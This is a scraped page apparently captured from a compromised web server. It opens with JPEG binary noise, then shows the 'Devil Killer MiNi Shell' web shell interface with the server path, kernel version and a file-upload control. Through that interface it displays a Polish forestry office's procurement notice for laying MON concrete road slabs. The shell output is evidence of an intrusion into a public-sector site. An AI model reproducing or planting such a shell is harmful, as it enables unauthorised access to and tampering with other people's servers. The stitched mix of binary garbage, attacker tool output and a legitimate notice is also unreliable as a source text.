JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20231031/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20231031/0047231901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Utwardzenie płytami drogowymi typu MON tymczasowego miejsca składowania drewna na terenie leśnictwa Wolność. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Skarb Państwa PGL Lasy Państwowe Nadleśnictwo Rytel</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 090550740</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rytel-Dworzec 4</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Rytel</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">89-642</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL637 - Chojnicki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">52 334 18 50</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">52 334 18 51</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">rytel@torun.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://rytel.torun.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Utwardzenie płytami drogowymi typu MON tymczasowego miejsca składowania drewna na terenie leśnictwa Wolność. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-943eac2b-77c2-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00472319</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-10-31</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00519048/03/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa kruszywa z wbudowaniem na terenie Nadleśnictwa Rytel</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_rytel/proceedings <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lasy_rytel/proceedings</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów<br/>elektronicznych, cyfrowego odwzorowania dokumentów w postaci papierowej (elektronicznych kopii dokumentów stworzonych w postaci papierowej) oraz<br/>informacji przekazywanych przy ich użyciu opisane zostały Regulaminie korzystania z platformy https://platformazakupowa.pl/, stanowiącym załącznik nr 8 do SWZ. Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia,akceptuje te wymagania oraz warunki korzystania z ww. platformy.<br/>Maksymalny rozmiar plików przesyłanych za pośrednictwem platformy<br/>https://platformazakupowa.pl/ na złożenie, zmiany, wycofanie oferty wynosi 150 MB,<br/>natomiast przy komunikacji wielkość pliku to maksymalnie 500 MB. Za datę przekazania oferty przyjmuje się datę jej złożenia na platformie<br/>https://platformazakupowa.pl/. Za datę przekazania wniosków, zawiadomień,<br/>dokumentów elektronicznych, oświadczeń lub cyfrowych odwzorowań dokumentów w postaci papierowej (elektronicznych kopii dokumentów stworzonych w postaci papierowej) oraz innych informacji przyjmuje się datę ich przekazania na adres poczty<br/>elektronicznej Zamawiającego wskazany w pkt 11.9 lit b) SWZ lub złożenia na platformie https://platformazakupowa.pl/.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Stosownie do art.13 ust.1 i2 rozporządzenia PE i Rady (UE) 2016/679 z dnia 27.04.16 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119 z 04.05.2016 r.,str.1–„RODO”) Zamawiający informuje, iż administratorem danych osobowych jest CompNet Sp. z o.o. Administrator wyznaczył IODO p. Patryka Makowskiego, z którym w sprawach dotyczących przetwarzania danych osobowych można skontaktować się za pośrednictwem poczty elektronicznej(iod@comp-net.pl) lub telefonicznie pod nr 796 400 977.Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zam.publ. w sposób gwarantujący zabezpieczenie przed ich bezprawnym rozpowszechnianiem.Zamawiający udostępnia dane osobowe, o których mowa w art.10 RODO w celu umożliwienia korzystania ze środków ochrony prawnej, o których mowa w dzialeIX PZP, do upływu terminu do ich wniesienia.Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające upoważnienie.Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności. Dane osobowe przetwarzane będą na podstawie art.6 ust.1 lit.c RODO w celu związanym z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki określone w art.255-256 PZP–w celu zawarcia umowy w sprawie zam.publ. oraz jej realizacji, a także udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w oparciu o przepisy PZP, a także ustawy o dostępie do informacji publ.Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zam.publ., a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie zam. publ.Niezależnie od postanowień pkt powyżej, w przypadku zawarcia umowy w sprawie zam.publ., dane osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zam.publ.Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne i konsultingowe. Więcej informacji znajduje się w pkt. 22 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego nie przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, określone w art. 21 RODO prawo sprzeciwu wobec przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>22.14. Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów upoważnionych na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach sprawowania władzy publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane osobowe są przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">S.270.2.1.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 226130,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakres prac przewidzianych do wykonania obejmuje dostawę i ułożenie płyt<br/>drogowych typu MON na drodze dojazdowej o długości – 30,00m i szerokości -6,00m<br/>(ogółem-300,00m2) oraz poboczy gruntowych o szerokości – 0,50 m, wykonanie placu<br/>manewrowego o wymiarach -30,00 m x 30,00 m (ogółem- 900,00 m2).<br/>Nawierzchnia drogi i placu manewrowego zostanie wykonana z płyt drogowych typu<br/>MON o wymiarach – 300 x 150 x 15cm na warstwie odsączającej grubości – 20,00cm.<br/>Płyty drogowe wykonane zgodnie z normą PN-EN 1339:2005. Płyty winny być<br/>krzyżowo zbrojone stalą wg. PN –ISO 6935-2, PN-ISO 6935-2/Ak/. Powinny odpowiadać<br/>wymaganiom PN-EN 206:2003, PN-88/B-06250. Odporność na ścieranie 18 000/ 5 000<br/>(mm3/mm2). Odporność na działanie mrozu, stopień mrozoodporności F 150; Wytrzymałość<br/>na ściskanie, klasa betonu nie mniejsza niż C30/35; nasiąkliwość poniżej 5%. Powierzchnie<br/>płyt powinny być bez rys, pęknięć i ubytków betonu, o fakturze z formy lub zatartej, zgodnie z<br/>wymaganiami. Krawędzie płyt powinny być równe i proste. Odchyłki od wymiarów<br/>nominalnych: długość +/-5 mm, szerokość +/- 5mm, grubość +/- 3mm. Do dostarczonej partii<br/>płyt należy przedłożyć certyfikat zgodności lub deklarację zgodności z polską normą.<br/>W cenę przedmiotu zamówienia należy wliczyć wszystkie koszty dotyczące wykonania<br/>zadania jak: koszty zakupu i transportu płyt drogowych, rozładunku, korytowania drogi,<br/>ułożenia płyt drogowych, wykonania poboczy drogi. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> W ramach realizacji Umowy Zamawiający jest uprawniony zlecić Wykonawcy dodatkowy zakres rzeczowy w stosunku do łącznej ilości wszystkich czynności wycenionych w Ofercie („Opcja”).<br/>Zamawiający nie jest zobowiązany do zlecenia prac objętych przedmiotem Opcji, a Wykonawcy nie służy roszczenie o ich zlecenie.<br/>Skorzystanie z Opcji może nastąpić przez cały okres realizacji Przedmiotu Umowy. Zamawiający przewiduje możliwość skorzystania z Opcji w przypadku: <br/>1) wystąpienia konieczności zwiększenia zakresu rzeczowego usług stanowiących przedmiot zamówienia w następstwie przyczyn przyrodniczych, klimatycznych, atmosferycznych bądź związanych z prawidłowym prowadzeniem gospodarki leśnej, <br/>2) powierzenia Zamawiającemu nowych zadań gospodarczych lub publicznych.<br/><br/>Przedmiotem Opcji będą takie same (analogiczne) prace, jak opisane w SWZ i wycenione przez Wykonawcę w Ofercie. W ramach Opcji, wedle wyboru Zamawiającego, mogą zostać zlecone wszystkie, niektóre lub tylko jedna z prac wskazanych w SWZ i wycenionych przez Wykonawcę w Ofercie. <br/>Prace będące przedmiotem Opcji mogą zostać zlecone w ilości, która nie będzie przekraczała 20 % Wartości Przedmiotu Umowy. Podstawą określenia wartości prac zleconych w ramach Opcji (w celu określenia jej zakresu) będą ceny jednostkowe poszczególnych prac. <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwość udzielenia zamówień, o których mowa w art. 214<br/>ust. 1 pkt 7 PZP, stanowiących nie więcej niż 30% wartości realizowanego zamówienia<br/>podstawowego. Zamówienia te polegać będą na wykonaniu podobnych robót<br/>budowlanych do opisanych w dokumentacji projektowej. Dopuszcza się również<br/>możliwość wykonania tych robót przy użyciu innych materiałów niż w przypadku<br/>robót podstawowych, a także z zastosowaniem innych technologii. Udzielane<br/>zamówienia będą realizowane na zasadach umowy podstawowej. Wynagrodzenie<br/>Wykonawcy ustalane będzie w oparciu o normatywne nakłady czasu pracy, zużycia<br/>materiałów i pracy sprzętu wg odpowiednich Katalogów Nakładów Rzeczowych<br/>(dalej: KNR), przy zastosowaniu tych samych norm, standardów i parametrów jak w<br/>przypadku robót podstawowych. Zamówienia te mogą zostać udzielone w okresie 3 lat<br/>od dnia udzielenia zamówienia podstawowego.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty Zamawiający będzie się kierował następującymi kryteriami oceny<br/>ofert:<br/>1) Cena – z wagą 60 %,<br/>2) Wydłużenie okresu gwarancji - z wagą 40%.<br/>17.2. Sposób obliczania punktów:<br/>1) W ramach kryterium „Cena(C)” ocena ofert zostanie dokonana przy zastosowaniu<br/>wzoru:<br/>Cn<br/>C = ------------ x100 pkt x 60%<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>Ocenie w ramach kryterium „Cena” podlegać będzie cena łączna brutto podana w<br/>Ofercie (załącznik nr 1 do SWZ).<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór<br/>prowadziłby do powstania u Zamawiającego obowiązku podatkowego zgodnie z<br/>przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty<br/>dolicza do przedstawionej w niej ceny podatek od towarów i usług, który miałby<br/>obowiązek rozliczyć zgodnie z tymi przepisami.<br/>2) W ramach kryterium „Wydłużenie okresu gwarancji (G)” oceniane będzie<br/>wydłużenie okresu gwarancji na roboty budowlane w stosunku do minimalnego<br/>okresu gwarancji wynikającego z SWZ (tj. 12 miesięcy od dnia odbioru końcowego<br/>robót poświadczonego protokołem odbioru końcowego). Do oceny w ramach<br/>kryterium zostanie przyjęty okres Gwarancji zadeklarowany w formularzu oferty.<br/>Ocena ofert w tym kryterium zostanie dokonana przy zastosowaniu poniższego<br/>wzoru:<br/>Go<br/>G = ------------------- x 100 pkt x 40%<br/>Gmax<br/>gdzie:<br/>G – liczba punktów w kryterium „Wydłużenie okresu gwarancji”<br/>Go – długość okresu wydłużenia gwarancji podana w ocenianej ofercie<br/>Gmax – największa długość okresu wydłużenia gwarancji ze wszystkich ofert<br/>podlegających badaniu<br/><br/>Liczbę miesięcy określającej wydłużenie okresu gwarancji należy podać w liczbach<br/>naturalnych. Wykonawca może zaproponować okres gwarancji tylko w pełnych<br/>miesiącach.<br/>Wykonawcy mogą zaoferować maksymalne wydłużenie okresu gwarancji<br/>wynoszące 12 miesięcy. W przypadku zaoferowania wydłużenia okresu gwarancji o<br/>okres dłuższy niż 12 miesięcy do oceny w ramach kryterium oceny ofert przyjęte<br/>zostanie 12 miesięczne wydłużenie gwarancji.<br/>W umowie w sprawie zamówienia publicznego obowiązywać będzie okres gwarancji<br/>zadeklarowany przez Wykonawcę w ofercie. W sytuacji, gdy Wykonawca, nie<br/>zadeklaruje /nie złoży podpisu/ udzielenia gwarancji, w tym kryterium Zamawiający<br/>uzna, że Wykonawca zapewnia minimalną długość okresu gwarancji wymaganą przez<br/>Zamawiającego. Wskazanie okresu gwarancji krótszego niż 12 miesięcy, skutkować<br/>będzie odrzuceniem oferty przez Zamawiającego - jako niezgodnej z treścią SWZ.<br/>Niniejsze zamówienie zostanie udzielone temu Wykonawcy, którego oferta uzyska<br/>najwyższą liczbę punktów w ostatecznej ocenie punktowej obliczonej wg wzoru:<br/>Ocena = C + G , gdzie:<br/>C - liczba punktów w kryterium „Cena oferty”<br/>G - liczba punktów w kryterium „Wydłużenie okresu gwarancji”<br/>Uzyskana liczba punktów w ramach kryterium zaokrąglana będzie do drugiego<br/>miejsca po przecinku. Po tak obliczonej ilości punktów zostanie ustalona kolejność<br/>ofert, w tym oferta najkorzystniejsza.<br/>Oferta może uzyskać maksymalnie 100 punktów.<br/>Jeżeli nie można dokonać wyboru najkorzystniejszej oferty z uwagi na to, że dwie lub<br/>więcej ofert przedstawia taki sam bilans ceny, Zamawiający wzywa Wykonawców,<br/>którzy złożyli te oferty, do złożenia w terminie określonym przez zamawiającego ofert<br/>dodatkowych zawierających nową cenę.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">wydłużenie terminu gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> W postępowaniu mogą brać udział Wykonawcy, którzy spełniają warunki<br/>udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania<br/>tego warunku udziału w postępowaniu.<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub<br/>zawodowej:<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania<br/>tego warunku udziału w postępowaniu.<br/>3) sytuacji ekonomicznej lub finansowej.<br/>Zamawiający nie stawia szczególnych wymagań w zakresie opisu spełniania<br/>warunku udziału w postępowaniu w odniesieniu do warunku dot. sytuacji<br/>ekonomicznej i sytuacji finansowej.<br/>4) zdolności technicznej lub zawodowej.<br/>a) W zakresie potencjału technicznego:<br/>Warunek ten, w zakresie doświadczenia, zostanie uznany za<br/>spełniony, jeśli Wykonawca wykaże, że w okresie ostatnich 5 lat<br/>przed upływem terminu składania ofert ( a jeśli okres prowadzenia<br/>działalności jest krótszy – w tym okresie) wykonał należycie co<br/>najmniej 1 robotę budowlaną ( przez robotę budowlaną rozumie się<br/>wykonanie prac na podstawie 1 umowy ) obejmującą budowę lub<br/>przebudowę lub modernizację lub remont drogi o wartości nie<br/>mniejszej niż 150 000,00 zł brutto.<br/>Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z<br/>formułą „spełnia”/„nie spełnia”, w oparciu o informacje zawarte w dokumentach i<br/>oświadczeniach, o których mowa w rozdziale 10. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw do wykluczenia z postępowania, o których<br/>mowa w pkt 7.1 SWZ oraz w celu potwierdzenia spełniania warunków udziału w<br/>postępowaniu, o których mowa w pkt 8.1. SWZ Wykonawca składa wraz z ofertą<br/>oświadczenie, o którym mowa w art. 125 ust. 1 PZP oraz art. 273 ust. 2 ustawy Pzp w<br/>zakresie wskazanym przez Zamawiającego wraz z oświadczeniem o braku podstaw<br/>wykluczenia z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022<br/>r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na<br/>Ukrainę oraz służących ochronie bezpieczeństwa narodowego – wzór oświadczenia<br/>stanowi załącznik nr 6 do SWZ.<br/>A nadto odpowiednie pełnomocnictwa (jeżeli umocowanie 